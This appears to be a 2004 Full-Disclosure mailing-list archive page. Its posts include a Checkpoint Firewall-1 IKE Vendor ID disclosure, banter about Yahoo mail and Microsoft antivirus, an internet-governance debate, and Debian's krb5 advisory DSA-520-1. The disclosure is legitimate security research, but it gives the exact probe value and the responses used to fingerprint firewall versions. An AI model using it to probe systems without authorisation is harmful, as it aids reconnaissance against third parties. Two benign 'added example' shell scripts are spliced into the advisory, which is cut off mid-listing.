Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
of the blackhat community, please hack and remove us from the net




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage

2004-06-16 Thread ADT
So basically, the issue is that Checkpoint is following RFC 2408 (ISAKMP)?

Specifically section 3.16:

The Vendor ID Payload contains a vendor defined constant.  The
 constant is used by vendors to identify and recognize remote
 instances of their implementations.  This mechanism allows a vendor
 to experiment with new features while maintaining backwards
 compatibility. 

While perhaps this is unfortunate, it is clearly documented and I
know that Brett Eldridge gave a talk on this specific issue at DefCon
X.

-Aaron

On Wed, 16 Jun 2004 15:45:29 +0100, Roy Hills [EMAIL PROTECTED] wrote:
 
 Checkpoint Firewall-1 IKE Vendor ID information leakage
 
 Introduction:
 
 Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
 return an IKE Vendor ID payload when it receives an IKE packet with
 a specific Vendor ID payload.  The Vendor ID payload that is returned
 identifies the system as Checkpoint Firewall-1 and also determines the
 Firewall-1 version and service-pack or feature-pack revision number.
 This is an information leakage issue which can be used to fingerprint
 the Firewall-1 system.
 
 This information leakage issue has been verified for Checkpoint Firewall-1
 versions from 4.1 (no service pack) to NG AI R55 inclusive.  Firewall-1
 version 4.0 is not vulnerable because it does not return any Vendor ID
 payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
 because they do not support IPsec VPN.  However, most people are running
 either NG or 4.1 and therefore this issue will apply to most Firewall-1
 installations that have IPsec VPN enabled.
 
 I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
 and demonstrate this issue.
 
 Full details are available at:
 http://www.nta-monitor.com/news/checkpoint2004/index.htm
 
 Details:
 
 If an IKE Phase-1 packet with a Vendor ID payload containing the data
 f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data
 encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
 or higher which supports IKE, the Firewall will respond with a Vendor ID
 payload containing data which identifies it as a Checkpoint Firewall-1
 system, provides details about the version of the Firewall software,
 and contains some additional information.
 
 The data that is returned in the Vendor ID payload from the
 Firewall consists of the same 20-byte sequence that was sent
 (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
 of data that contains the encoded version number and some other details
 that appear to contain details of the Firewall's capabilities.
 
 I presume that the 20-byte magic string is an SHA1 hash of something.
 I'd be interested to find out what source string hashes to this value.
 
 Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
 NG AI R55 (latest current version), I have found the following returned
 Vendor ID payloads.  In the payloads below, a dot (.) represents an
 arbitary hex digit:
 
 Firewall-1 4.1 Base (no service pack)
 f4ed19e0c114eb516faaac0ee37daf2807b4381f00010002
 
 Firewall-1 4.1 SP1
 f4ed19e0c114eb516faaac0ee37daf2807b4381f00010003
 
 Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
 f4ed19e0c114eb516faaac0ee37daf2807b4381f00010fa2
 

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

2004-06-16 Thread José María Mateos
On Tuesday, June 15 at 18:57, Syed Imran Ali wrote:
 about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.

.es still does, and they say it's not going to change, at least
for a while.

Regards.

-- 
** Las Penas del Agente Smith: http://chema.homelinux.org **
http://EuropeSwPatentFree.hispalinux.es - EuropeSwPatentFree
GPG key ID: 0x2948FA19 | Please encrypt private mail


signature.asc
Description: Digital signature


Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

2004-06-16 Thread morning_wood
rofl, are you sure you're not Bipin?


Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.

 File Source disclosure vulnerability in all web servers.
 Remote explotation of this issue can be achived by clicking with the
 right button into the website and selecting the view source code option.
 This option will display the contents of the html code.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Akamai

2004-06-16 Thread Peter van den Heuvel
Yo!
In other arenas, they call the concept diplomatic immunity
Indeed. And is almost as idiotic there. But the issue is that the 
Internet does not have any reverse responsibility mechanism; an evil 
minor-player under a lax-average-provider can do whatever he feels that 
suits him best, and disregard majority opinion. An anarchy without even 
fundamental feedback regulatory mechanisms is simply prey; me paying for 
another's fortune. And the least thing that would work is governments 
imposing their preferences. So maybe ICANN and the likes should consider 
some form of responsibility in these matters.

Alas, Peter
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] MS Anti Virus?

2004-06-16 Thread Andre Ludwig
Oh this should be good...


http://www.reuters.com/newsArticle.jhtml?storyID=5429092

 SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
Research) is still on track to offer an anti-virus product that will
compete against similar software offered by Symantec Corp. (SYMC.O:
Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
Profile, Research) , the world's largest software maker said late on
Monday.

Mike Nash, chief of Microsoft's security business unit, told reporters
that Microsoft is developing software to protect personal computers
running Windows against malicious software, the worms and viruses that
have plagued users with data loss, shutdowns and disruptions in Web
traffic in recent years.

We're still planning to offer our own AV (anti-virus) product, Nash said.

Asked if that would hurt sales of competing products, such as Network
Associates' McAfee and Symantec's Norton family of products, Nash said
that Microsoft said that it would sell its anti-virus program as a
separate product from Windows, rather than including it in Windows.

Redmond, Washington-based Microsoft acquired anti-virus technology from GeCAD
Software Srl., a Romanian software company, last year to develop its
own software.

Microsoft, whose Windows operating system is a favorite target for
computer viruses, launched a company-wide Trustworthy Computing
campaign in early 2002 to boost the security and reliability of its
software.

Nash did not give a time frame for the release of Microsoft's
anti-virus software.



and another 

http://www.entmag.com/news/article.asp?EditorialsID=6272



by Scott Bekker

6/16/04

Microsoft is leaning toward offering a paid anti-virus subscription service.

Mike Nash, corporate vice president for the security business and
technology unit at Microsoft, said Microsoft will probably sell its
own anti-virus software and subscription service. It is the first
public signal that Microsoft intends to turn its acquisition of the
Romanian anti-virus company GeCAD into a product customers pay for.

The comments came up at a dinner with reporters in Seattle on Monday
night when Nash was asked how Microsoft's anti-virus efforts might
affect Symantec. I want to make sure customers have another choice,
the Bloomberg News agency quoted Nash as saying. Some people will
continue to use Symantec, and some will use ours.


Shares of Symantec, which gets 85 percent of its revenues from
anti-virus products, were down following Nash's comments, according to
Bloomberg.

Previously, Microsoft had been coy about its plans for GeCAD, which it
acquired last June. "This acquisition will help us and our partner
anti-virus providers further mitigate risks from these threats," Nash
said at the time, implying Microsoft would use GeCAD's programming
talent to make Windows and other Microsoft products more resistant to
viruses.

But Microsoft also immediately indicated at the time that it was fully
evaluating how to proceed with GeCAD's technology and employees. In a
white paper published last June on Microsoft's Web site, the company
wrote, "Details of the Microsoft antivirus solution, including any
product plans, pricing, and a timeline for delivery, are not yet
available. Microsoft strongly recommends that customers continue to
use antivirus solutions from industry partners and keep their virus
signatures updated."

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

2004-06-16 Thread Andre Ludwig
Just think of all those l33t 0-days you can now have in your webmail!!!

;)

This is definitely OT..

Andre Ludwig CISSP

On Tue, 15 Jun 2004 11:42:10 -0500 (CDT), Ron DuFresne
[EMAIL PROTECTED] wrote:
 
 
 The real questions fellows is though, what does any of this have to do
 with security, and who cares how much storage space your particular ISP or
 e-mail provider supplies?
 
 Thanks,
 
 Ron DuFresne
 
 
 
 On Tue, 15 Jun 2004, William Warren wrote:
 
  hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
 
 
  Syed Imran Ali wrote:
 
   Hiya,
  
   It is nice to see my inbox today, having 100MB of storage space, 84%
   remaining. Yahoo now allows up to 10MB attachments too. I am not sure
   whether .co.uk is still allowing POP with 100MB, as it was with 6MB.
  
   Regards,
  
   S. Imran Ali
  
  
   ___
   Full-Disclosure - We believe in it.
   Charter: http://lists.netsys.com/full-disclosure-charter.html
  
 
  --
  My Foundation verse:
  Isa 54:17  No weapon that is formed against thee shall prosper; and
  every tongue that shall rise against thee in judgment thou shalt
  condemn. This is the heritage of the servants of the LORD, and their
  righteousness is of me, saith the LORD.
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 ~~
 Cutting the space budget really restores my faith in humanity.  It
 eliminates dreams, goals, and ideals and lets us get straight to the
 business of hate, debauchery, and self-annihilation. -- Johnny Hart
 ***testing, only testing, and damn good at it too!***
 
 OK, so you're a Ph.D.  Just don't touch anything.
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] MS Anti Virus?

2004-06-16 Thread [EMAIL PROTECTED]


Well they can't get a simple thing like a mail client right, 
they can't get a semi-simple thing like a browser right, they 
can't get not-so-simple thing like an operating system right, so 
let's branch out and fuck up some other things.

No doubt a few years from now you'll see a line of food in the 
stores with their name on it. No doubt limited to doughnuts and 
pretzels.

At least they can charge for a whole and the customer will 
insist on a portion.

HOLE IN ONE ! gOLf cOURSEs next.

-- 
http://www.malware.com



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MS Anti Virus?

2004-06-16 Thread Andre Ludwig
Think the mafia refers to this as a protection racket...

Man, so much can be made of this; it's a techy comedy gold mine.


"Our software sucks so bad that the market for anti-virus software for
our platform is such a lucrative market that we can't stay out of it."

Andre Ludwig CISSP

On Wed, 16 Jun 2004 19:41:49 -0400, slacker [EMAIL PROTECTED] wrote:
 
 snip
   SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
  Research) is still on track to offer an anti-virus product that will
  compete against similar software offered by Symantec Corp. (SYMC.O:
  Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
  Profile, Research) , the world's largest software maker said late on
 
 Oh yeah, what's the average delay to release on exploit patches? What makes
 me think that they are going to be that slow on releasing AV updates?  =P
 
 slacker
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

2004-06-16 Thread Shawn Nunley
Did anyone else notice that they also raised the storage limit to 2Gb
for paid account holders?  (SBC Yahoo DSL and accounts like that,
19.99/mo)

That's quite a lot of spam storage.

Wanna talk about security?  How about all those phishing and spam
emails being stored (and potentially opened) for far longer than was
possible before.  Seems like a security problem waiting to happen.

So far, in my Gmail account, I've had exactly 0 spam emails, and I
have that address pasted all over the web.  Either their spam
filtering is incredible, or the spammers haven't picked it up yet.  My
Yahoo account, on the other hand, is 100% spam except for mailing list
traffic.

-Shawn

Shawn Nunley, CISSP
Director, Technology Development
NetScaler, Inc.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

2004-06-16 Thread Shawn Nunley
sorry, I meant to say 19.99/year, not per month for the 2gb storage limit.

On Wed, 16 Jun 2004 18:28:44 -0700, Shawn Nunley [EMAIL PROTECTED] wrote:
 
 
 Did anyone else notice that they also raised the storage limit to 2Gb
 for paid account holders?  (SBC Yahoo DSL and accounts like that,
 19.99/mo)
 
 That's quite a lot of spam storage.
 
 Wanna talk about security?  How about all those phishing and spam
 emails being stored (and potentially opened) for far longer than was
 possible before.  Seems like a security problem waiting to happen.
 
 So far, in my Gmail account, I've had exactly 0 spam emails, and I
 have that address pasted all over the web.  Either their spam
 filtering is incredible, or the spammers haven't picked it up yet.  My
 Yahoo account, on the other hand, is 100% spam except for mailing list
 traffic.
 
 -Shawn
 
 Shawn Nunley, CISSP
 Director, Technology Development
 NetScaler, Inc.
 


-- 
Shawn Nunley, CISSP
Director, Technology Development
NetScaler, Inc.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: Akamai

2004-06-16 Thread gabriel rosenkoetter
On Wed, Jun 16, 2004 at 04:57:10PM -0400, [EMAIL PROTECTED] wrote:
 On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel [EMAIL PROTECTED]  said:
  flanking reverse of responsibilities. It's idiotic that providers or even 
  full countries can completely ignore / reject any complaint without 
  having their AS or DNS taken down.
 In other arenas, they call the concept diplomatic immunity

In those same arenas, they call the denial of privilege by an
unrecognized entity (or entities) anarchy. Which is one of those
things that sounds like a really good idea till you're no longer
in the de facto majority. (They came for...)

On Wed, Jun 16, 2004 at 12:23:35PM -0500, Paul Schmehl wrote:
 Unless networks begin doing this routinely (including ISPs), legislation
 will be introduced to solve the problem, and then we will all be much
 worse off.  There's nothing like a law to completely screw things up.

Actually, a clearly defined, limited, exact law is precisely what
we need here. We just lack any appropriate legislative body. (No
national legislature qualifies, and no international body--they
exist: NATO, UN, EU--can make a plausible claim to jurisdiction.)

-- 
gabriel rosenkoetter
[EMAIL PROTECTED]




[Full-Disclosure] [SECURITY] [DSA 520-1] New krb5 packages fix buffer overflows

2004-06-16 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 520-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
June 16th, 2004 http://www.debian.org/security/faq
- --

Package: krb5
Vulnerability  : buffer overflows
Problem-Type   : remote
Debian-specific: no
CVE Ids: CAN-2004-0523

In their advisory MITKRB5-SA-2004-001, the MIT Kerberos team announced the
existence of buffer overflow vulnerabilities in the
krb5_aname_to_localname function.  This function is only used if
aname_to_localname is enabled in the configuration (this is not
enabled by default).

For the current stable distribution (woody), this problem has been
fixed in version 1.2.4-5woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.3-2.

We recommend that you update your krb5 package.

Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.dsc
  Size/MD5 checksum:  750 88922316a5c4dc4f54eedfc8d1b2b21e
http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.diff.gz
  Size/MD5 checksum:77079 1d99337aa5734ab47878c706c1cd16e7
http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4.orig.tar.gz
  Size/MD5 checksum:  5443051 663add9b5942be74a86fa860a3fa4167

  Architecture independent components:

http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.2.4-5woody5_all.deb
  Size/MD5 checksum:   514592 b608f9f7c599049696daa569a9a9c95b

  Alpha architecture:


http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   253392 39dace8011ec70211cafe7482a464bef

http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   217158 2eec6d86a559c9bf151b06bb55916347

http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:62608 6ad21c730aa61227f335042c83057e35

http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   251804 32c06efac81f7f875e993e7f6343ee10

http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:76040 2e6e74208a9c7f401c23076d32e29d3d

http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:58704 897ad549370be37234179d87084012e9

http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   207166 60ec8f0d5f60af7e03f18d68bdd1bfc3

http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:83328 49d5415c510a3b16b0c7e6831d6295d1

http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   632940 b5feb5c5d4ffb4dcc36607fb6c094ddd

http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_alpha.deb
  Size/MD5 checksum:   367114 1126cddacb3eb385c363cc24bd8ccf30

  ARM architecture:


http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:   196910 00f2c6dc3b783b559418d3acaae9ccc4

http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:   160204 6fbdbe00198ac08c127da7b605cb4401
http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:48382 06c5be009cd9391342dfc97e18cc1c11
http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:   198234 7a6fc77bf7307de8f5cb7ab203586e94

http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:63316 8e5b77aaefc5319b730b24ebd39d4c6d

http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:48952 1c46d9156b91cfbe3bf2a7b2406c4d19
http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_arm.deb
  Size/MD5 checksum:   165652 
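
Added example, not part of DSA 520-1 or of MIT's advisory: a shell check for the condition the DSA above makes the exposure depend on, "aname_to_localname is enabled in the configuration". It assumes that this means explicit principal-to-local-name mappings in krb5.conf, i.e. auth_to_local and auth_to_local_names entries under [realms]; if that assumption does not hold for your krb5 build, treat the output as a hint only. The krb5.conf it examines when run without arguments is constructed for the example, not taken from any real host.

```shell
#!/bin/sh
# Added example, not part of DSA 520-1 or MIT's advisory. Lists explicit
# principal-to-username mappings in a krb5.conf (auth_to_local and
# auth_to_local_names under [realms]). Assumption: those directives are
# what the DSA means by "aname_to_localname is enabled in the
# configuration". Needs only a POSIX awk.

# krb5_explicit_mappings FILE: print "REALM DIRECTIVE VALUE" for each
# explicit mapping; exit 0 if at least one was found, 1 if none.
krb5_explicit_mappings() {
    awk '
        /^[ \t]*#/ { next }                          # comment line
        /^[ \t]*\[/ {                                # [section] header
            section = $0; gsub(/[^A-Za-z_]/, "", section)
            depth = 0; realm = ""; next
        }
        section == "realms" {
            line = $0; sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
            if (line ~ /^auth_to_local(_names)?[ \t]*=/) {
                key = line; sub(/[ \t]*=.*/, "", key)
                val = line; sub(/^[^=]*=[ \t]*/, "", val)
                print realm, key, val
                found++
                if (val ~ /[{]/) depth++             # auth_to_local_names = { ... } nests
                next
            }
            if (line ~ /^[^ \t=]+[ \t]*=[ \t]*[{]/) { # "REALM = {" opens a realm block
                if (depth == 0) { realm = line; sub(/[ \t]*=.*/, "", realm) }
                depth++
                next
            }
            if (line ~ /^[}]/) {                     # closing brace
                depth--
                if (depth == 0) realm = ""
            }
        }
        END { exit (found ? 0 : 1) }
    ' "$1"
}

# Constructed sample krb5.conf (not from a real host): one realm with
# explicit mappings, one without.
sample_conf() {
    cat <<'EOF'
[libdefaults]
    default_realm = EXAMPLE.COM

[realms]
    EXAMPLE.COM = {
        kdc = kdc.example.com
        auth_to_local = RULE:[1:$1@$0](.*@EXAMPLE\.COM)s/@.*//
        auth_to_local_names = {
            jdoe = joe
        }
    }
    OTHER.ORG = {
        kdc = kdc.other.org
    }
EOF
}

# Usage: sh krb5-mappings.sh /etc/krb5.conf   (exit 0 = mappings present)
if [ "$#" -gt 0 ]; then
    krb5_explicit_mappings "$1"
else
    tmp=$(mktemp); sample_conf > "$tmp"
    krb5_explicit_mappings "$tmp"; rm -f "$tmp"
fi
```

Exit status 0 means explicit mappings were found and the host reaches the affected code path. Nothing here replaces the upgrade: a host with no mappings today can gain them with the next configuration push, so install 1.2.4-5woody5 regardless.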

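
The upgrade instructions above leave the integrity check to the reader: the Size/MD5 checksum lines are there so that a package fetched by hand is compared against the signed advisory before dpkg -i runs. Added example (not Debian's tooling and not from the advisory): a POSIX shell script that parses those URL/checksum pairs and verifies the downloaded files. It assumes md5sum from GNU coreutils; the advisory excerpt and the files it checks when run without arguments are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of DSA 520-1 or Debian's tooling: check files
# fetched by hand ("wget url ... dpkg -i file.deb") against the
# "URL / Size/MD5 checksum: SIZE MD5" pairs a Debian advisory lists,
# and refuse to install anything that does not match.
# Assumes md5sum(1) from GNU coreutils and a POSIX awk.

# parse_advisory: read advisory text on stdin and print one
# "FILENAME SIZE MD5" line per listed URL.
parse_advisory() {
    awk '
        /^http/ { url = $1; next }
        /Size\/MD5 checksum/ {
            if (url != "") {
                n = split(url, parts, "/")
                print parts[n], $(NF-1), $NF
            }
            url = ""
        }
    '
}

# verify_file DIR NAME SIZE MD5: return 0 only if DIR/NAME exists and both
# its byte count and its MD5 digest equal the advertised values.
verify_file() {
    dir=$1; name=$2; want_size=$3; want_md5=$4
    f="$dir/$name"
    if [ ! -f "$f" ]; then
        echo "MISSING $name"
        return 1
    fi
    got_size=$(wc -c < "$f" | tr -d ' ')
    got_md5=$(md5sum "$f" | cut -d' ' -f1)
    if [ "$got_size" = "$want_size" ] && [ "$got_md5" = "$want_md5" ]; then
        echo "OK      $name"
        return 0
    fi
    echo "BAD     $name (size $got_size, md5 $got_md5)"
    return 1
}

# verify_all DIR < advisory.txt: check every listed file under DIR and
# return the number of files that are missing or do not match.
verify_all() {
    dir=$1
    fails=0
    list=$(parse_advisory)
    # a here-document instead of a pipe keeps the loop in this shell,
    # so $fails survives it
    while read -r name size md5; do
        [ -n "$name" ] || continue
        verify_file "$dir" "$name" "$size" "$md5" || fails=$((fails + 1))
    done <<EOF
$list
EOF
    return "$fails"
}

# Constructed advisory excerpt (file names and digests are not real):
# one matching file, one with the right size but a wrong digest, one
# that was never downloaded.
sample_advisory() {
    cat <<'EOF'
http://security.debian.org/pool/updates/main/k/krb5/krb5-user_example.deb
  Size/MD5 checksum:        6 b1946ac92492d2347c6235b4d2611184
http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_example.deb
  Size/MD5 checksum:        6 00000000000000000000000000000000
http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_example.deb
  Size/MD5 checksum:   251804 0123456789abcdef0123456789abcdef
EOF
}

# demo: build the sample download directory, check it, return the failure count (2)
demo() {
    d=$(mktemp -d)
    printf 'hello\n' > "$d/krb5-user_example.deb"   # 6 bytes, md5 b1946ac9...
    printf 'wrong\n' > "$d/krb5-doc_example.deb"    # right size, wrong digest
    sample_advisory | verify_all "$d"
    rc=$?
    rm -rf "$d"
    return "$rc"
}

# Usage: sh verify-dsa.sh DOWNLOAD_DIR < dsa-520-1.txt && dpkg -i DOWNLOAD_DIR/*.deb
if [ "$#" -gt 0 ]; then
    verify_all "$1"
else
    demo; echo "failures: $?"
fi
```

Check the PGP signature on the advisory before trusting the digests, since the list is only as trustworthy as the mail it arrived in; and note that MD5 is no longer collision resistant, so on anything newer than woody rely on apt's signed Release files rather than on a hand check like this one.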
Re: [Full-Disclosure] MS Anti Virus?

2004-06-16 Thread Chris Cappuccio
I hate to say this, but I don't think Microsoft software could be any
worse than Symantec...

Andre Ludwig [EMAIL PROTECTED] wrote:
 Think the mafia refers to this as a protection racket...
 
 man so much can be made of this its a techy comedy gold mine.
 
 
 our software sucks so bad that the market for anti virus software for
 our platform is such a lucrative market that we cant stay out of it
 
 Andre Ludwig CISSP
 
 On Wed, 16 Jun 2004 19:41:49 -0400, slacker [EMAIL PROTECTED] wrote:
  
  snip
SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
   Research) is still on track to offer an anti-virus product that will
   compete against similar software offered by Symantec Corp. (SYMC.O:
   Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
   Profile, Research) , the world's largest software maker said late on
  
  Oh yeah, what's the average delay to release on exploit patches? What makes
  me think that they are going to be that slow on releasing AV updates?  =P
  
  slacker
  
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
When it absolutely, positively had to be there yesterday: Temporal Express

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] MS Anti Virus?

2004-06-16 Thread Robert Michael Slade
Ah, how soon they forget.  (Kids these days ...)

Heck, *I* forget.  Was it Windows 3.0 or 3.1?  Anyway, DOS 6.

And lo, Microsoft went forth unto the land, and spake unto the makers of
AV, and did say, who will give unto us their product for cheap, that we
may call it by our name, and all geeks may use of it, and bless our name.
And the makers of AV muttered amongst themselves, and said, and if we do
this, what shall it profit us?  And Microsoft spake unto them saying, are
ye not the makers of endless upgrades?  And shall ye not sell these
upgrades unto those who have need of them since all will have thine
product even though it be called by our name?

And lo, Central Point did underbid all the others.  And Microsoft did take
unto itself CPAV, and call it MSAV, and all those who purchased DOS 6 did
partake of it, and thought that it was good.  But none knew that they
needed to upgrade it.  And then came unto Microsoft and Central Point the
shame of the 14 bytes, and geeks despised them.  And Central Point was
cast into Gehenna, or Symantec, which is the same thing.

[EMAIL PROTECTED]  [EMAIL PROTECTED]  [EMAIL PROTECTED]
Find virus, book info http://victoria.tc.ca/techrev/rms.htm
Mirrored at http://sun.soci.niu.edu/~rslade/rms.htm
Review mailing list: send mail to [EMAIL PROTECTED]
Robert Slade's Guide to Computer Viruses, 0-387-94663-2 (800-SPRINGER)
Viruses Revealed 0072130903
Software Forensics (forthcoming)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html